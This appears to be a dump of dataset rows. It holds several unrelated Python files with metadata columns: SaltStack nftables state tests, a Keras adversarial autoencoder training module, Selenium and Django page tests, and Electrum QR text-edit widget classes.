"salt", table="", chain="", ignore_absence=False
),
ret,
)
mock = MagicMock(
side_effect=[
{"result": False, "comment": ""},
{"result": True, "comment": ""},
{"result": True, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.check_chain": mock}):
ret.update(
{
"comment": "Failed to flush chain in table"
" in family ipv4, chain does not exist."
}
)
self.assertDictEqual(
nftables.flush(
"salt", table="", chain="", ignore_absence=False
),
ret,
)
mock = MagicMock(
side_effect=[
{"result": True, "comment": ""},
{"result": False, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.flush": mock}):
ret.update(
{
"changes": {"locale": "salt"},
"comment": "Flush nftables rules in table chain ipv4 family",
"result": True,
}
)
self.assertDictEqual(
nftables.flush("salt", table="", chain=""), ret
)
ret.update(
{
"changes": {},
"comment": "Failed to flush nftables rules",
"result": False,
}
)
self.assertDictEqual(
nftables.flush("salt", table="", chain=""), ret
)
def test_set_policy(self):
"""
Test to sets the default policy for nftables firewall tables
"""
ret = {"name": "salt", "changes": {}, "result": True, "comment": ""}
mock = MagicMock(return_value=[])
with patch.object(nftables, "_STATE_INTERNAL_KEYWORDS", mock):
mock = MagicMock(return_value="stack")
with patch.dict(nftables.__salt__, {"nftables.get_policy": mock}):
ret.update(
{
"comment": "nftables default policy for chain"
" on table for ipv4 already set to stack"
}
)
self.assertDictEqual(
nftables.set_policy("salt", table="", chain="", policy="stack"),
ret,
)
with patch.dict(nftables.__opts__, {"test": True}):
ret.update(
{
"comment": "nftables default policy for chain"
" on table for ipv4 needs to be set to sal",
"result": None,
}
)
self.assertDictEqual(
nftables.set_policy("salt", table="", chain="", policy="sal"),
ret,
)
with patch.dict(nftables.__opts__, {"test": False}):
mock = MagicMock(side_effect=[True, False])
with patch.dict(nftables.__salt__, {"nftables.set_policy": mock}):
ret.update(
{
"changes": {"locale": "salt"},
"comment": "Set default policy for to sal family ipv4",
"result": True,
}
)
self.assertDictEqual(
nftables.set_policy(
"salt", table="", chain="", policy="sal"
),
ret,
)
ret.update(
{
"comment": "Failed to set nftables default policy",
"result": False,
"changes": {},
}
)
self.assertDictEqual(
nftables.set_policy(
"salt", table="", chain="", policy="sal"
),
ret,
)
def test_table_present(self):
"""
Test to verify a table exists.
"""
ret = {"name": "salt", "changes": {}, "result": True, "comment": ""}
mock = MagicMock(
side_effect=[
{"result": True},
{"result": False},
{"result": False},
{"result": False},
]
)
with patch.dict(nftables.__salt__, {"nftables.check_table": mock}):
ret.update({"comment": "nftables table salt already exists in family ipv4"})
self.assertDictEqual(nftables.table_present("salt"), ret)
with patch.dict(nftables.__opts__, {"test": True}):
ret.update(
{
"comment": "nftables table salt would be created in family ipv4",
"result": None,
}
)
self.assertDictEqual(nftables.table_present("salt"), ret)
with patch.dict(nftables.__opts__, {"test": False}):
mock = MagicMock(side_effect=[{"result": True}, {"result": False}])
with patch.dict(nftables.__salt__, {"nftables.new_table": mock}):
ret.update(
{
"result": True,
"comment": "nftables table salt successfully created in family ipv4",
"changes": {"locale": "salt"},
}
)
self.assertDictEqual(nftables.table_present("salt"), ret)
ret.update(
{
"changes": {},
"result": False,
"comment": "Failed to create table salt for family ipv4",
}
)
self.assertDictEqual(nftables.table_present("salt"), ret)
def test_table_absent(self):
"""
Test to verify a table is absent.
"""
ret = {"name": "salt", "changes": {}, "result": True, "comment": ""}
mock = MagicMock(
side_effect=[
{"result": False},
{"result": True},
{"result": True},
{"result": True},
]
)
with patch.dict(nftables.__salt__, {"nftables.check_table": mock}):
ret.update(
{"comment": "nftables table salt is already absent from family ipv4"}
)
self.assertDictEqual(nftables.table_absent("salt"), ret)
with patch.dict(nftables.__opts__, {"test": True}):
ret.update(
{
"comment": "nftables table salt would be deleted from family ipv4",
"result": None,
}
)
self.assertDictEqual(nftables.table_absent("salt"), ret)
with patch.dict(nftables.__opts__, {"test": False}):
mock = MagicMock(side_effect=[False, "a"])
with patch.dict(nftables.__salt__, {"nftables.flush": mock}):
mock = MagicMock(side_effect=[{"result": True}, {"result": False}])
with patch.dict(nftables.__salt__, {"nftables.delete_table": mock}):
ret.update(
{
"changes": {"locale": "salt"},
"comment": "nftables table salt successfully deleted from family ipv4",
"result": True,
}
)
self.assertDictEqual(nftables.table_absent("salt"), ret)
ret.update(
{
"changes": {},
"result": False,
"comment": "Failed to delete table salt from family ipv4",
}
)
self.assertDictEqual(nftables.table_absent("salt"), ret)
| 42.357143
| 103
| 0.354831
| 1,587
| 24,313
| 5.284814
| 0.069313
| 0.04507
| 0.057351
| 0.092643
| 0.864552
| 0.822106
| 0.803029
| 0.747824
| 0.714439
| 0.667104
| 0
| 0.002483
| 0.536215
| 24,313
| 573
| 104
| 42.431065
| 0.741309
| 0.019496
| 0
| 0.568826
| 0
| 0
| 0.162501
| 0.005984
| 0
| 0
| 0
| 0
| 0.066802
| 1
| 0.020243
| false
| 0
| 0.008097
| 0.002024
| 0.032389
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfb09e9e32836126de842f13dc7d82318b91ca24
| 20,333
|
py
|
Python
|
ddganAE/models/aae.py
|
Zeff020/Adversarial_ROM
|
8c9e7ff86250e9370e5fdd2018f9ad04ded5f122
|
[
"MIT"
] | 1
|
2021-12-27T06:14:32.000Z
|
2021-12-27T06:14:32.000Z
|
ddganAE/models/aae.py
|
Zeff020/Adversarial_ROM
|
8c9e7ff86250e9370e5fdd2018f9ad04ded5f122
|
[
"MIT"
] | null | null | null |
ddganAE/models/aae.py
|
Zeff020/Adversarial_ROM
|
8c9e7ff86250e9370e5fdd2018f9ad04ded5f122
|
[
"MIT"
] | 3
|
2021-08-05T11:17:37.000Z
|
2021-09-02T02:37:44.000Z
|
"""
Implementation of two classes with a slightly different version of the
adversarial autoencoder model. The former corresponds to the original paper
on adversarial autoencoders:
https://arxiv.org/abs/1511.05644
and the second is an adaptation with weighted losses inspired by:
https://arxiv.org/abs/2104.06297
"""
from keras.layers import Input
from keras.models import Model
import numpy as np
import tensorflow as tf
import datetime
import wandb
__author__ = "Zef Wolffs"
__credits__ = []
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "Zef Wolffs"
__email__ = "zefwolffs@gmail.com"
__status__ = "Development"
class AAE:
"""
Adversarial autoencoder class
"""
def __init__(self, encoder, decoder, discriminator, optimizer, seed=None):
"""
Constructor of adversarial autoencoder class
Args:
encoder (tf.keras.Model): Encoder model
decoder (tf.keras.Model): Decoder model
discriminator (tf.keras.Model): Discriminator model
optimizer (tf.keras.optimizers.Optimizer): Optimization method
seed (int, optional): Seed that will be used wherever possible.
Defaults to None.
"""
self.encoder = encoder
self.decoder = decoder
self.discriminator = discriminator
self.seed = seed
self.latent_dim = self.decoder.layers[0].input_shape[1]
self.optimizer = optimizer
def compile(self, input_shape):
"""
Compilation of models according to original paper on adversarial
autoencoders
Args:
input_shape (tuple): Shape of input data
"""
self.input_shape = input_shape
grid = Input(shape=self.input_shape)
encoded_repr = self.encoder(grid)
gen_grid = self.decoder(encoded_repr)
self.autoencoder = Model(grid, gen_grid)
valid = self.discriminator(encoded_repr)
self.encoder_discriminator = Model(grid, valid)
self.discriminator.compile(optimizer=self.optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
self.autoencoder.compile(optimizer=self.optimizer,
loss='mse',
metrics=['accuracy'])
self.discriminator.trainable = False
self.encoder_discriminator.compile(optimizer=self.optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
def train(self, train_data, epochs, val_data=None, batch_size=128,
val_batch_size=128, wandb_log=False):
"""
Training model according to original paper on adversarial autoencoders
Args:
train_data (np.ndarray): Train dataset
epochs (int): Number of training epochs to execute
val_data (np.ndarray, optional): Validation dataset. Defaults to
None.
batch_size (int, optional): Training batch size. Defaults to 128.
val_batch_size (int, optional): Validation batch size. Defaults to
128.
wandb_log (bool, optional): Whether to log results to wandb. Note
function needs to be called in
wandb.init() scope for this to work.
Defaults to False.
"""
d_loss_val = g_loss_val = None
train_dataset = tf.data.Dataset.from_tensor_slices(train_data)
train_dataset = train_dataset.shuffle(buffer_size=train_data.shape[0],
reshuffle_each_iteration=True,
seed=self.seed).\
batch(batch_size, drop_remainder=True)
if val_data is not None:
val_dataset = tf.data.Dataset.from_tensor_slices(val_data)
val_dataset = val_dataset.shuffle(
buffer_size=val_data.shape[0],
reshuffle_each_iteration=True,
seed=self.seed).\
batch(val_batch_size, drop_remainder=True)
# Set up tensorboard logging
current_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
train_log_dir = 'logs/' + current_time + '/train'
val_log_dir = 'logs/' + current_time + '/val'
train_summary_writer = tf.summary.create_file_writer(train_log_dir)
val_summary_writer = tf.summary.create_file_writer(val_log_dir)
# Adversarial ground truths
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
for epoch in range(epochs):
# Reconstruction phase
loss_cum = 0
acc_cum = 0
for step, grids in enumerate(train_dataset):
# Train the autoencoder reconstruction
loss, acc = self.autoencoder.train_on_batch(grids, grids)
loss_cum += loss
acc_cum += acc
# Average the loss and accuracy over the entire dataset
loss = loss_cum/(step+1)
acc = acc_cum/(step+1)
# Regularization phase
d_loss_cum = 0
g_loss_cum = 0
for step, grids in enumerate(train_dataset):
# Generate real and fake latent space. Fake latent space is
# the normal distribution
latent_fake = self.encoder.predict(grids)
latent_real = np.random.normal(size=(batch_size,
self.latent_dim))
# Train the discriminator
d_loss_real = self.discriminator.train_on_batch(latent_real,
valid)[0]
d_loss_fake = self.discriminator.train_on_batch(latent_fake,
fake)[0]
d_loss_cum += 0.5 * np.add(d_loss_real, d_loss_fake)
# Train generator
g_loss_cum += \
self.encoder_discriminator.train_on_batch(grids, valid)[0]
d_loss = d_loss_cum/(step+1)
g_loss = g_loss_cum/(step+1)
with train_summary_writer.as_default():
tf.summary.scalar('loss - ae', loss, step=epoch)
tf.summary.scalar('accuracy - ae', acc, step=epoch)
tf.summary.scalar('loss - g', g_loss, step=epoch)
tf.summary.scalar('loss - d', d_loss, step=epoch)
# Calculate the accuracies on the validation set
if val_data is not None:
loss_val, acc_val, d_loss_val, g_loss_val = \
self.validate(val_dataset, val_batch_size)
with val_summary_writer.as_default():
tf.summary.scalar('loss - ae', loss_val, step=epoch)
tf.summary.scalar('accuracy - ae', acc_val, step=epoch)
tf.summary.scalar('loss - g', g_loss_val, step=epoch)
tf.summary.scalar('loss - d', d_loss_val, step=epoch)
if wandb_log:
if val_data is not None:
log = {"epoch": epoch, "train_loss": loss,
"train_accuracy": acc,
"g_train_loss": g_loss,
"d_train_loss": d_loss,
"g_valid_loss": g_loss_val,
"d_valid_loss": d_loss_val,
"valid_loss": loss_val,
"valid_accuracy": acc_val}
else:
log = {"epoch": epoch, "train_loss": loss,
"train_accuracy": acc,
"g_train_loss": g_loss,
"d_train_loss": d_loss}
wandb.log(log)
def validate(self, val_dataset, val_batch_size=128):
"""
Validate model on previously unseen dataset.
Args:
val_dataset (np.ndarray): Validation dataset
val_batch_size (int, optional): Validation batch size. Defaults to
128.
Returns:
tuple: Validation losses and accuracies
"""
# Adversarial ground truths
valid = np.ones((val_batch_size, 1))
fake = np.zeros((val_batch_size, 1))
loss_cum = 0
acc_cum = 0
d_loss_cum = 0
g_loss_cum = 0
for step, val_grids in enumerate(val_dataset):
loss, acc = self.autoencoder.evaluate(val_grids, val_grids,
verbose=0)
loss_cum += loss
acc_cum += acc
latent_fake = self.encoder.predict(val_grids)
latent_real = np.random.normal(size=(val_batch_size,
self.latent_dim))
d_loss_real = self.discriminator.evaluate(latent_real,
valid, verbose=0)[0]
d_loss_fake = self.discriminator.evaluate(latent_fake,
fake, verbose=0)[0]
d_loss_cum += 0.5 * np.add(d_loss_real, d_loss_fake)
g_loss_cum += \
self.encoder_discriminator.evaluate(val_grids, valid,
verbose=0)[0]
# Average the loss and accuracy over the entire dataset
loss = loss_cum/(step+1)
acc = acc_cum/(step+1)
d_loss = d_loss_cum/(step+1)
g_loss = g_loss_cum/(step+1)
return loss, acc, d_loss, g_loss
class AAE_combined_loss:
"""
Adversarial autoencoder with combined loss class
"""
def __init__(self, encoder, decoder, discriminator, optimizer, seed=None):
"""
Constructor of adversarial autoencoder class
Args:
encoder (tf.keras.Model): Encoder model
decoder (tf.keras.Model): Decoder model
discriminator (tf.keras.Model): Discriminator model
optimizer (tf.keras.optimizers.Optimizer): Optimization method
seed (int, optional): Seed that will be used wherever possible.
Defaults to None.
"""
self.encoder = encoder
self.decoder = decoder
self.discriminator = discriminator
self.seed = seed
self.latent_dim = self.decoder.layers[0].input_shape[1]
self.optimizer = optimizer
def compile(self, input_shape):
"""
Compilation of models where we use a training method that weights
the losses of the discriminator and autoencoder and as such combines
them into one loss and trains on them simultaneously.
Args:
input_shape (tuple): Shape of input data
"""
self.input_shape = input_shape
self.discriminator.compile(optimizer=self.optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
self.discriminator.trainable = False
grid = Input(shape=self.input_shape)
encoded_repr = self.encoder(grid)
reconstructed_grid = self.decoder(encoded_repr)
valid = self.discriminator(encoded_repr)
self.adversarial_autoencoder = Model(grid, [reconstructed_grid, valid])
self.adversarial_autoencoder.compile(loss=['mse',
'binary_crossentropy'],
loss_weights=[0.999, 0.001],
optimizer=self.optimizer)
def train(self, train_data, epochs, val_data=None,
batch_size=128, val_batch_size=128, wandb_log=False,
n_discriminator=5):
"""
Training model with combined loss strategy
Args:
train_data (np.ndarray): Train dataset
epochs (int): Number of training epochs to execute
val_data (np.ndarray, optional): Validation dataset. Defaults to
None.
batch_size (int, optional): Training batch size. Defaults to 128.
val_batch_size (int, optional): Validation batch size. Defaults to
128.
wandb_log (bool, optional): Whether to log results to wandb. Note
function needs to be called in
wandb.init() scope for this to work.
Defaults to False.
"""
d_loss_val = g_loss_val = None
train_dataset = tf.data.Dataset.from_tensor_slices(train_data)
train_dataset = train_dataset.shuffle(buffer_size=train_data.shape[0],
reshuffle_each_iteration=True,
seed=self.seed).\
batch(batch_size, drop_remainder=True)
if val_data is not None:
val_dataset = tf.data.Dataset.from_tensor_slices(val_data)
val_dataset = val_dataset.shuffle(
buffer_size=val_data.shape[0],
reshuffle_each_iteration=True,
seed=self.seed).\
batch(val_batch_size, drop_remainder=True)
# Set up tensorboard logging
current_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
train_log_dir = 'logs/' + current_time + '/train'
val_log_dir = 'logs/' + current_time + '/val'
train_summary_writer = tf.summary.create_file_writer(train_log_dir)
val_summary_writer = tf.summary.create_file_writer(val_log_dir)
# Adversarial ground truths
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
for epoch in range(epochs):
# Regularization phase
d_loss_cum = 0
g_loss_cum = 0
g_step = 0
step = 0
for step, grids in enumerate(train_dataset):
latent_fake = self.encoder.predict(grids)
latent_real = np.random.normal(size=(batch_size,
self.latent_dim))
# Train the discriminator
d_loss_real = self.discriminator.train_on_batch(latent_real,
valid)[0]
d_loss_fake = self.discriminator.train_on_batch(latent_fake,
fake)[0]
d_loss_cum += 0.5 * np.add(d_loss_real, d_loss_fake)
if step % n_discriminator == 0:
g_loss_cum += \
self.adversarial_autoencoder.train_on_batch(grids,
[grids,
valid])[0]
g_step += 1
d_loss = d_loss_cum/(step+1)
g_loss = g_loss_cum/(g_step+1)
with train_summary_writer.as_default():
tf.summary.scalar('loss - g', g_loss, step=epoch)
tf.summary.scalar('loss - d', d_loss, step=epoch)
# Calculate the accuracies on the validation set
if val_data is not None:
d_loss_val, g_loss_val = self.validate(val_dataset,
val_batch_size)
with val_summary_writer.as_default():
tf.summary.scalar('loss - g', g_loss_val, step=epoch)
tf.summary.scalar('loss - d', d_loss_val, step=epoch)
if wandb_log:
if val_data is not None:
log = {"epoch": epoch,
"g_train_loss": g_loss,
"d_train_loss": d_loss,
"g_valid_loss": g_loss_val,
"d_valid_loss": d_loss_val}
else:
log = {"epoch": epoch,
"g_train_loss": g_loss,
"d_train_loss": d_loss}
wandb.log(log)
def validate(self, val_dataset, val_batch_size=128):
"""
Validate model on previously unseen dataset.
Args:
val_dataset (np.array): Validation dataset
val_batch_size (int, optional): Validation batch size. Defaults to
128.
Returns:
tuple: Validation losses and accuracies
"""
# Adversarial ground truths
valid = np.ones((val_batch_size, 1))
fake = np.zeros((val_batch_size, 1))
d_loss_cum = 0
g_loss_cum = 0
step = 0
for step, val_grids in enumerate(val_dataset):
latent_fake = self.encoder.predict(val_grids)
latent_real = np.random.normal(size=(val_batch_size,
self.latent_dim))
d_loss_real = self.discriminator.evaluate(latent_real,
valid, verbose=0)[0]
d_loss_fake = self.discriminator.evaluate(latent_fake,
fake, verbose=0)[0]
d_loss_cum += 0.5 * np.add(d_loss_real, d_loss_fake)
g_loss_cum += self.adversarial_autoencoder.evaluate(val_grids,
[val_grids,
valid],
verbose=0)[0]
# Average the loss and accuracy over the entire dataset
d_loss = d_loss_cum/(step+1)
g_loss = g_loss_cum/(step+1)
return d_loss, g_loss
def print_losses(d_loss, g_loss, epoch, d_loss_val=None, g_loss_val=None):
"""
Convenience function to print a set of losses. Can be used by adversarial
type of networks
Args:
d_loss (float): Discriminator loss value
g_loss (float): Generator loss value
epoch (int): Current epoch
d_loss_val (float, optional): Validation discriminator loss value.
Defaults to None.
g_loss_val (float, optional): Validation generator loss value.
Defaults to None.
"""
print("%d: [D loss: %f, acc: %.2f%%] [G loss: %f, mse: %f]" %
(epoch, d_loss[0], 100*d_loss[1], g_loss[0], g_loss[1]))
if d_loss_val is not None and g_loss_val is not None:
print("%d val: [D loss: %f, acc: %.2f%%] [G loss: %f, mse: %f]" %
(epoch, d_loss_val[0], 100*d_loss_val[1], g_loss_val[0],
g_loss_val[1]))
def plot_losses(d_loss, g_loss, liveloss, d_loss_val=None,
g_loss_val=None):
"""
Convenience function to plot a set of losses. Can be used by adversarial
type of networks
Args:
d_loss (float): Discriminator loss value
g_loss (float): Generator loss value
livaloss (object): livelossplot class instance
d_loss_val (float, optional): Validation discriminator loss value.
Defaults to None.
g_loss_val (float, optional): Validation generator loss value.
Defaults to None.
"""
if d_loss_val is not None and g_loss_val is not None:
liveloss.update({'val_generator_loss_training': g_loss[0],
'generator_loss_validation': g_loss_val[0],
'discriminator_loss_training': d_loss[0],
'val_discriminator_loss_validation':
d_loss_val[0]}
)
else:
liveloss.update({'generator_loss_training': g_loss[0],
'discriminator_loss_training': d_loss[0]})
liveloss.send()
| 39.481553
| 79
| 0.530419
| 2,230
| 20,333
| 4.590583
| 0.109865
| 0.032724
| 0.0211
| 0.01856
| 0.846244
| 0.829149
| 0.78226
| 0.775422
| 0.753346
| 0.738595
| 0
| 0.012901
| 0.390056
| 20,333
| 514
| 80
| 39.558366
| 0.81253
| 0.248561
| 0
| 0.714286
| 0
| 0.007326
| 0.05871
| 0.011189
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03663
| false
| 0
| 0.021978
| 0
| 0.07326
| 0.010989
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfed2f5c041c43ad0dabbc0c2dbeac43955f9472
| 2,879
|
py
|
Python
|
test_app/tests/test_pjaxr_ready_pjaxr_always.py
|
jbeee/jquery-pjaxr
|
59d9b8a604932d5426500b8524d43e3883d28431
|
[
"MIT"
] | 1
|
2015-11-05T17:10:39.000Z
|
2015-11-05T17:10:39.000Z
|
test_app/tests/test_pjaxr_ready_pjaxr_always.py
|
jbeee/jquery-pjaxr
|
59d9b8a604932d5426500b8524d43e3883d28431
|
[
"MIT"
] | null | null | null |
test_app/tests/test_pjaxr_ready_pjaxr_always.py
|
jbeee/jquery-pjaxr
|
59d9b8a604932d5426500b8524d43e3883d28431
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from .helpers import SeleniumTestCase
class PjaxrReadyPjaxrAlwaysTest(SeleniumTestCase):
def test_pjaxr_ready_pjaxr_always(self):
self.browser_get_reverse('index')
self.assertEqual(len(self.browser.find_elements_by_class_name('pjaxr-always-div')), 0)
self.assertEqual(len(self.browser.find_elements_by_class_name('pjaxr-ready-div')), 0)
pjaxr_ready_pjaxr_always_link = self.browser.find_element_by_css_selector('#pjaxr-ready-pjaxr-always-link')
pjaxr_ready_pjaxr_always_link.click()
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-always-div')) == 1)
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-ready-div')) == 1)
about_link = self.browser.find_element_by_css_selector('#about-link')
about_link.click()
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-always-div')) == 2)
self.assertEqual(len(self.browser.find_elements_by_class_name('pjaxr-ready-div')), 1)
project_link = self.browser.find_element_by_css_selector('#project-link')
project_link.click()
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-always-div')) == 3)
self.assertEqual(len(self.browser.find_elements_by_class_name('pjaxr-ready-div')), 1)
self.browser_get_reverse('pjaxr_ready_pjaxr_always')
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-always-div')) == 1)
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-ready-div')) == 1)
about_link = self.browser.find_element_by_css_selector('#about-link')
about_link.click()
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-always-div')) == 2)
self.assertEqual(len(self.browser.find_elements_by_class_name('pjaxr-ready-div')), 1)
def test_disabled_pjaxr(self):
self.browser_get_reverse('index')
self.assertEqual(len(self.browser.find_elements_by_class_name('pjaxr-always-div')), 0)
self.assertEqual(len(self.browser.find_elements_by_class_name('pjaxr-ready-div')), 0)
self.browser.execute_script('$.fn.pjaxr.disable();')
self.browser_get_reverse('pjaxr_ready_pjaxr_always', pjaxr_state='disabled')
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-always-div')) == 1)
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-ready-div')) == 1)
self.browser_get_reverse('about')
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-always-div')) == 0)
self.wait.until(lambda browser: len(browser.find_elements_by_class_name('pjaxr-ready-div')) == 0)
| 48.79661
| 115
| 0.733241
| 404
| 2,879
| 4.90099
| 0.113861
| 0.122222
| 0.172727
| 0.190909
| 0.886869
| 0.842424
| 0.842424
| 0.842424
| 0.771212
| 0.771212
| 0
| 0.007235
| 0.135811
| 2,879
| 58
| 116
| 49.637931
| 0.788585
| 0
| 0
| 0.567568
| 0
| 0
| 0.151441
| 0.034387
| 0
| 0
| 0
| 0
| 0.189189
| 1
| 0.054054
| false
| 0
| 0.054054
| 0
| 0.135135
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c606005ac74b95127ed38697aadc73b6e5a364c
| 2,951
|
py
|
Python
|
myapp/tests/test_urls.py
|
kaido1224/currencytracker
|
5fbf77d11746aa7bdfadffcb9511a397df248b1b
|
[
"MIT"
] | 1
|
2021-12-29T22:17:17.000Z
|
2021-12-29T22:17:17.000Z
|
myapp/tests/test_urls.py
|
kaido1224/currencytracker
|
5fbf77d11746aa7bdfadffcb9511a397df248b1b
|
[
"MIT"
] | null | null | null |
myapp/tests/test_urls.py
|
kaido1224/currencytracker
|
5fbf77d11746aa7bdfadffcb9511a397df248b1b
|
[
"MIT"
] | null | null | null |
from django import test
from django.urls import reverse
# Test page link functionality.
class PageLinksTest(test.TestCase):
def test_home_page(self):
response = self.client.get("/", follow=True)
self.assertEqual(response.status_code, 200)
def test_home_page_by_name(self):
response = self.client.get(reverse("myapp:index"), follow=True)
self.assertEqual(response.status_code, 200)
def test_books_page(self):
response = self.client.get("/books", follow=True)
self.assertEqual(response.status_code, 200)
def test_books_page_by_name(self):
response = self.client.get(reverse("myapp:books"), follow=True)
self.assertEqual(response.status_code, 200)
def test_add_book_page(self):
response = self.client.get("/books/add", follow=True)
self.assertEqual(response.status_code, 200)
def test_add_book_page_by_name(self):
response = self.client.get(reverse("myapp:add_book"), follow=True)
self.assertEqual(response.status_code, 200)
def test_edit_book_page(self):
response = self.client.get("/books/edit/1", follow=True)
self.assertEqual(response.status_code, 200)
def test_delete_book_page(self):
response = self.client.get("/books/delete/1", follow=True)
self.assertEqual(response.status_code, 200)
def test_collection_page(self):
response = self.client.get("/collection", follow=True)
self.assertEqual(response.status_code, 200)
def test_collection_page_by_name(self):
response = self.client.get(reverse("myapp:collection"), follow=True)
self.assertEqual(response.status_code, 200)
def test_add_entry_page(self):
response = self.client.get("/collection/add", follow=True)
self.assertEqual(response.status_code, 200)
def test_add_entry_page_by_name(self):
response = self.client.get(reverse("myapp:add_entry"), follow=True)
self.assertEqual(response.status_code, 200)
def test_edit_entry_page(self):
response = self.client.get("/collection/edit/1", follow=True)
self.assertEqual(response.status_code, 200)
def test_delete_entry_page(self):
response = self.client.get("/collection/delete/1", follow=True)
self.assertEqual(response.status_code, 200)
def test_login_page(self):
response = self.client.get("/login", follow=True)
self.assertEqual(response.status_code, 200)
def test_login_page_by_name(self):
response = self.client.get(reverse("myapp:login"), follow=True)
self.assertEqual(response.status_code, 200)
def test_logout_page(self):
response = self.client.get("/logout", follow=True)
self.assertEqual(response.status_code, 200)
def test_logout_page_by_name(self):
response = self.client.get(reverse("myapp:logout"), follow=True)
self.assertEqual(response.status_code, 200)
| 37.35443
| 76
| 0.697052
| 388
| 2,951
| 5.100515
| 0.097938
| 0.063669
| 0.145528
| 0.200101
| 0.933805
| 0.933805
| 0.893886
| 0.868621
| 0.752906
| 0.723598
| 0
| 0.024046
| 0.18265
| 2,951
| 78
| 77
| 37.833333
| 0.796434
| 0.009827
| 0
| 0.315789
| 0
| 0
| 0.072603
| 0
| 0
| 0
| 0
| 0
| 0.315789
| 1
| 0.315789
| false
| 0
| 0.035088
| 0
| 0.368421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7a23ef5ee248ccc828180985f7019380bc511b6d
| 1,911
|
py
|
Python
|
electrum/gui/qt/qrtextedit.py
|
JamieDriver/electrum
|
2a31f80d0962197780a2f45c279c83236051e4de
|
[
"MIT"
] | null | null | null |
electrum/gui/qt/qrtextedit.py
|
JamieDriver/electrum
|
2a31f80d0962197780a2f45c279c83236051e4de
|
[
"MIT"
] | null | null | null |
electrum/gui/qt/qrtextedit.py
|
JamieDriver/electrum
|
2a31f80d0962197780a2f45c279c83236051e4de
|
[
"MIT"
] | null | null | null |
from electrum.i18n import _
from electrum.plugin import run_hook
from electrum.simple_config import SimpleConfig
from .util import ButtonsTextEdit, MessageBoxMixin
class ShowQRTextEdit(ButtonsTextEdit):
def __init__(self, text=None, *, config: SimpleConfig):
ButtonsTextEdit.__init__(self, text)
self.setReadOnly(True)
self.add_qr_show_button(config=config)
run_hook('show_text_edit', self)
def contextMenuEvent(self, e):
m = self.createStandardContextMenu()
m.addAction(_("Show as QR code"), self.on_qr_show_btn)
m.exec_(e.globalPos())
class ScanQRTextEdit(ButtonsTextEdit, MessageBoxMixin):
def __init__(self, text="", allow_multi: bool = False, *, config: SimpleConfig):
ButtonsTextEdit.__init__(self, text)
self.setReadOnly(False)
self.add_file_input_button(config=config, show_error=self.show_error)
self.add_qr_input_button(config=config, show_error=self.show_error, allow_multi=allow_multi)
run_hook('scan_text_edit', self)
def contextMenuEvent(self, e):
m = self.createStandardContextMenu()
m.addAction(_("Read QR code"), self.on_qr_input_btn)
m.exec_(e.globalPos())
class ScanShowQRTextEdit(ButtonsTextEdit, MessageBoxMixin):
def __init__(self, text="", allow_multi: bool = False, *, config: SimpleConfig):
ButtonsTextEdit.__init__(self, text)
self.setReadOnly(False)
self.add_qr_input_button(config=config, show_error=self.show_error, allow_multi=allow_multi)
self.add_qr_show_button(config=config)
run_hook('scan_text_edit', self)
run_hook('show_text_edit', self)
def contextMenuEvent(self, e):
m = self.createStandardContextMenu()
m.addAction(_("Read QR code"), self.on_qr_input_btn)
m.addAction(_("Show as QR code"), self.on_qr_show_btn)
m.exec_(e.globalPos())
| 36.75
| 100
| 0.707483
| 237
| 1,911
| 5.345992
| 0.206751
| 0.037885
| 0.056827
| 0.037885
| 0.81689
| 0.81689
| 0.776638
| 0.776638
| 0.729282
| 0.639305
| 0
| 0.001285
| 0.185243
| 1,911
| 51
| 101
| 37.470588
| 0.81246
| 0
| 0
| 0.736842
| 0
| 0
| 0.057561
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157895
| false
| 0
| 0.105263
| 0
| 0.342105
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
